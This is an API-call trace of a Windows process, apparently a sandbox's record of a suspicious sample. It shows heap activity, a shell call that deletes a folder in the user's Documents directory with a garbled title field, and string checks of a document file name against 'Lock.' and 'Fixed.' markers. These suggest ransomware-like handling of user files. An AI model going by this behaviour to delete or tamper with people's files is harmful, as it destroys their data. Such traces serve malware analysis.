RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0221.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0221.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0221.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0221.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0221.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0221.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0221.076] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/uhe R_MajVPhj", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj", lpFilePart=0x8cf650*="uhe R_MajVPhj") returned 0x27 [0221.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0221.076] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj")) returned 0x10 [0221.076] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\uhe R_MajVPhj", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0221.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0221.698] TranslateMessage (lpMsg=0x8cf968) returned 0 [0221.698] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0221.698] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0221.698] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0221.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0221.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0221.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0221.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0221.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wdchYxA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dchYxA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="chYxA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hYxA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YxA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xA7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KRrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RrFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rFzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FzTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zTiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TiR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iR.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0221.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0221.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0221.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0221.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0221.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2a734f8 [0221.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wdchYxA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dchYxA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="chYxA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hYxA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YxA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xA7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0221.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7KRrFzTiR.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 